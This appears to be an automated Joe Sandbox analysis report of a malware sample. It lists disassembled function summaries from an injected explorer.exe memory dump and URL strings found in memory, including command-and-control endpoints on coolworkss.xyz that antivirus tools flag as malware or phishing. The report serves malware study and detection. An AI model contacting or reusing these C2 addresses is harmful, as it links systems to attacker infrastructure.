Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: e2d6e4332fa07428ad682a722fde1d5278ae85ba108fb25da1136fbff3563ab8
Instruction ID: 7cf1eb941f9ba3cb8548407c8b06eb3ab171a550e5cb190efb830bf3991ce2ff
Opcode Fuzzy Hash: e2d6e4332fa07428ad682a722fde1d5278ae85ba108fb25da1136fbff3563ab8
Instruction Fuzzy Hash: 64416A71900209EFCF15DF98CD81AEEBBB5FF48314F14826AFA06A7212D3359961EB51

Uniqueness

Uniqueness Score: -1.00%

Function 008D6ABA Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(008EF120,00000000,00000000,008CDDF4), ref: 008D6B1D

Part of subcall function 008D9383: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,008DD3BE,?,00000000,-00000008), ref: 008D942F

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 008D6D78
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 008D6DC0
GetLastError.KERNEL32 ref: 008D6E63

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 82ff7b7bb2db91178e250a2cb87ce26dd33b2c0cd62ef9042f088efd6f1cf2f4
Instruction ID: 0e553845dbd3318379c43848164c127e61fc1bde4ffe3fa22c5c3b2779bd4964
Opcode Fuzzy Hash: 82ff7b7bb2db91178e250a2cb87ce26dd33b2c0cd62ef9042f088efd6f1cf2f4
Instruction Fuzzy Hash: 54D15B75D0065C9FCB15CFE8D880AADBBB5FF48314F24462AE855EB352E730A952CB50

Uniqueness

Uniqueness Score: -1.00%

Function 008DF3E6 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 008DF4AD
___AdjustPointer.LIBCMT ref: 008DF4D0
___AdjustPointer.LIBCMT ref: 008DF56C

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: d4bb204e37aada1cbd6a5ff5237c4f31b23a5364e5f3ae6f7e6dece8fb5c7467
Instruction ID: 6d21dc1e2a76e906e2e90c75ffdd08df35d62bd44522edf0054a4e51ed5fd8a5
Opcode Fuzzy Hash: d4bb204e37aada1cbd6a5ff5237c4f31b23a5364e5f3ae6f7e6dece8fb5c7467
Instruction Fuzzy Hash: 7451D172600606AFDB289F14E881B6A77B1FF00310F14423EEA16C7392E731ED91E795

Uniqueness

Uniqueness Score: -1.00%

Function 008D9950 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d63f4a3817bf4d138576bcddf4632be08b193ef727270b8fe1c6bebcd923ffc
Instruction ID: 0a276b41f1314b1ed0f08871f702c066fdfc9f573c7b7c6020673bdd945edea7
Opcode Fuzzy Hash: 6d63f4a3817bf4d138576bcddf4632be08b193ef727270b8fe1c6bebcd923ffc
Instruction Fuzzy Hash: 4341D872A00758BFD7249F7CD842F6ABBA8FB85720F10466BF196EB381D67199408781

Uniqueness

Uniqueness Score: -1.00%

Function 008D3285 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,008D3392,?,000000FF,00893C1C,00000000,008ECE74,?,008D3146,00000021,008E8CEC,008E8CE4,008E8CEC,00893C1C), ref: 008D3346

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 99d58f58debabe97653ad2c2e27a756315262282ce0c4196d50b5ed698c94c01
Instruction ID: 12b5e253265f6165ef1b87dcce8cdf2b9f891ece2038f245356515726de198d1
Opcode Fuzzy Hash: 99d58f58debabe97653ad2c2e27a756315262282ce0c4196d50b5ed698c94c01
Instruction Fuzzy Hash: 4521D235E01211ABCB269B25FD85A5E3768FB41770F250222E806EB391DA70EE01CAD2

Uniqueness

Uniqueness Score: -1.00%

Function 008DBAEF Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,00000000,?,008E1004,00000000,008DA1B0,?,008A5109,00000000,00000001,00000000,00000000), ref: 008DBB05
GetLastError.KERNEL32(?,008E1004,00000000,008DA1B0,?,008A5109,00000000,00000001,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 008DBB0F
__dosmaperr.LIBCMT ref: 008DBB16
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,008E1004,00000000,008DA1B0,?,008A5109,00000000,00000001,00000000,00000000), ref: 008DBB40

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: 3b0ab1d5e396a79e2db2458913f0d63c3285a17f18ccaf1206f778fe7471782a
Instruction ID: 7bc7f78816f07c4ab9156425bfea42845721455494e1d17421b7ee58684491f1
Opcode Fuzzy Hash: 3b0ab1d5e396a79e2db2458913f0d63c3285a17f18ccaf1206f778fe7471782a
Instruction Fuzzy Hash: 3DF08C32600200AFDB206FA6CC05E17BFA9FF44330711892AF55AC7224DB32E810CB50

Uniqueness

Uniqueness Score: -1.00%

Function 008DBB55 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,00000000,?,008E0F8C,00000000,00000000,008DA1B0,?,008A5109,00000000,00000001,00000000), ref: 008DBB6B
GetLastError.KERNEL32(?,008E0F8C,00000000,00000000,008DA1B0,?,008A5109,00000000,00000001,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 008DBB75
__dosmaperr.LIBCMT ref: 008DBB7C
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,008E0F8C,00000000,00000000,008DA1B0,?,008A5109,00000000,00000001,00000000,00000000), ref: 008DBBA6

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: 7e539bf77bcc48d6763bb8af1fad30a4ffe8a8ca9eb5433572e23445428596dc
Instruction ID: c2b46d81d845c1b1eb3ff1baab37378ba8eef3d92579e58f3e33bc39d80822e1
Opcode Fuzzy Hash: 7e539bf77bcc48d6763bb8af1fad30a4ffe8a8ca9eb5433572e23445428596dc
Instruction Fuzzy Hash: B5F0AF36200200EFDB205FA6CC48E17BFA9FF44370712892BF556C6224DB32E811CB50

Uniqueness

Uniqueness Score: -1.00%

Function 008E18E8 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,008DFC8A,00000000,00000001,00000000,008CDDF4,?,008D6EB7,008CDDF4,00000000,00000000), ref: 008E18FF
GetLastError.KERNEL32(?,008DFC8A,00000000,00000001,00000000,008CDDF4,?,008D6EB7,008CDDF4,00000000,00000000,008CDDF4,008CDDF4,?,008D6802,?), ref: 008E190B

Part of subcall function 008E195C: CloseHandle.KERNEL32(008EFB60,008E191B,?,008DFC8A,00000000,00000001,00000000,008CDDF4,?,008D6EB7,008CDDF4,00000000,00000000,008CDDF4,008CDDF4), ref: 008E196C

___initconout.LIBCMT ref: 008E191B

Part of subcall function 008E193D: CreateFileW.KERNEL32(008EBD18,40000000,00000003,00000000,00000003,00000000,00000000,008E18D9,008DFC77,008CDDF4,?,008D6EB7,008CDDF4,00000000,00000000,008CDDF4), ref: 008E1950

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,008DFC8A,00000000,00000001,00000000,008CDDF4,?,008D6EB7,008CDDF4,00000000,00000000,008CDDF4), ref: 008E1930

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 089f46d1d188eb195e9f847c5b62752fd42ccfc5e2b744dc90c3d36d150d415b
Instruction ID: 3a7e6d270940e83704f211cda3d94a783bc3bb1e6beece51bdb3dc3db4c06354
Opcode Fuzzy Hash: 089f46d1d188eb195e9f847c5b62752fd42ccfc5e2b744dc90c3d36d150d415b
Instruction Fuzzy Hash: 97F03736500199BBCF122F96DC59A8D3F26FF457A0B414010FE19D9131C6328820DB91

Uniqueness

Uniqueness Score: -1.00%

Function 008C1B10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 008C1B4F
__IsNonwritableInCurrentImage.LIBCMT ref: 008C1C03

Strings

csm, xrefs: 008C1BED

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 29bc7fae8d2b651264d872eeaee3cf58ad2d3b94740c98438e73abc423e0a70f
Instruction ID: b4f55ac9d517c38c220504087ec9f216c41bc3e6d104491a8400287e890003e6
Opcode Fuzzy Hash: 29bc7fae8d2b651264d872eeaee3cf58ad2d3b94740c98438e73abc423e0a70f
Instruction Fuzzy Hash: AB419034A002089BCF10DF69C888A9EBBB5FF56324F148159E814DB393E731EE15CB91

Uniqueness

Uniqueness Score: -1.00%

Function 008DF34F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 008DF5C6

Strings

csm, xrefs: 008DF5E8
csm, xrefs: 008DF659

Memory Dump Source

Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_891000_explorer.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 7ea04603b2098351e45706ec9cf1a992e8463c5939a276686464ae7cb9b4b4f0
Instruction ID: 65e90a7478cab2619dfcee689895c0c45c52704b106445bfaffbe948e5dd5379
Opcode Fuzzy Hash: 7ea04603b2098351e45706ec9cf1a992e8463c5939a276686464ae7cb9b4b4f0
Instruction Fuzzy Hash: AF31A132400218EBCF265F54E94496A7B65FF28315B18436BFE5A89732C332CD61EF81

Uniqueness

Uniqueness Score: -1.00%

Source: http://coolworkss.xyz/r	Avira URL Cloud: Label: malware
Source: http://coolworkss.xyz/c2sockO	Avira URL Cloud: Label: malware
Source: http://coolworkss.xyz/c2sock_	Avira URL Cloud: Label: malware
Source: http://coolworkss.xyz/c2sock?	Avira URL Cloud: Label: phishing
Source: http://coolworkss.xyz/44s	Avira URL Cloud: Label: malware
Source: http://coolworkss.xyz/c2sock	Avira URL Cloud: Label: phishing
Source: http://coolworkss.xyz:80/c2socka	Avira URL Cloud: Label: malware
Source: http://coolworkss.xyz/c2sock/	Avira URL Cloud: Label: phishing
Source: http://coolworkss.xyz/c2sock3	Avira URL Cloud: Label: malware
Source: http://coolworkss.xyz:80/c2sock	Avira URL Cloud: Label: phishing
Source: http://coolworkss.xyz/5	Avira URL Cloud: Label: malware
Source: http://coolworkss.xyz/c2sock:	Avira URL Cloud: Label: malware
Source: http://coolworkss.xyz/U	Avira URL Cloud: Label: malware
Source: http://coolworkss.xyz/yO3GNZ	Avira URL Cloud: Label: malware
Source: http://coolworkss.xyz/c2conf	Avira URL Cloud: Label: phishing
Source: http://coolworkss.xyz/	Avira URL Cloud: Label: malware
Source: http://coolworkss.xyz:80/c2sock;	Avira URL Cloud: Label: phishing
Source: http://coolworkss.xyz/c2sockw	Avira URL Cloud: Label: malware
Source: http://coolworkss.xyz/c2sockt	Avira URL Cloud: Label: malware
Source: http://coolworkss.xyz/c2socky	Avira URL Cloud: Label: malware

Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c0rl.m%L
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.google.com/p/v8/wiki/DebuggerProtocol
Source: explorer.exe, 00000013.00000003.352936105.0000000003384000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.391823528.0000000003367000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455198443.00000000032D1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455198443.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455198443.0000000003367000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455599716.0000000005CE6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/
Source: explorer.exe, 00000013.00000003.355913652.0000000003336000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/44s
Source: explorer.exe, 00000013.00000002.455198443.000000000334B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/5
Source: explorer.exe, 00000013.00000002.455198443.000000000331E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/U
Source: explorer.exe, 00000013.00000002.455198443.00000000032E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/c2conf
Source: explorer.exe, 00000013.00000003.366720503.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.357518038.0000000003388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/c2sock
Source: explorer.exe, 00000013.00000003.353007918.0000000003388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/c2sock/
Source: explorer.exe, 00000013.00000002.455198443.000000000331E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/c2sock3
Source: explorer.exe, 00000013.00000002.455198443.000000000333D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/c2sock:
Source: explorer.exe, 00000013.00000002.455543101.00000000059D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/c2sock?
Source: explorer.exe, 00000013.00000003.363893394.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.362220178.0000000003388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/c2sockO
Source: explorer.exe, 00000013.00000002.455543101.00000000059D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/c2sock_
Source: explorer.exe, 00000013.00000003.375236074.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.391797031.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.359062273.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.360661950.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.362220178.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.357518038.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455543101.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.376847383.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/c2sockt
Source: explorer.exe, 00000013.00000002.455543101.00000000059D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/c2sockw
Source: explorer.exe, 00000013.00000003.363893394.0000000003388000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.362220178.0000000003388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/c2socky
Source: explorer.exe, 00000013.00000002.455198443.0000000003367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/r
Source: explorer.exe, 00000013.00000003.391797031.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz/yO3GNZ
Source: explorer.exe, 00000013.00000003.391823528.0000000003367000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455198443.0000000003367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz:80/c2sock
Source: explorer.exe, 00000013.00000003.391823528.0000000003367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz:80/c2sock;
Source: explorer.exe, 00000013.00000003.391823528.0000000003367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://coolworkss.xyz:80/c2socka
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.co(m/D
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://daniel.haxx.se/blog/2011/02/21/localhost-hack-on-windows/
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://foo.com
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://insanecoding.blogspot.com/2007/11/pathmax-simply-isnt.html
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://invisible-island.net/xterm/ctlseqs/ctlseqs.html
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mathiasbynens.be/notes/javascript-encoding
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mths.be/punycode
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://narwhaljs.org)
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nodejs.org/
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
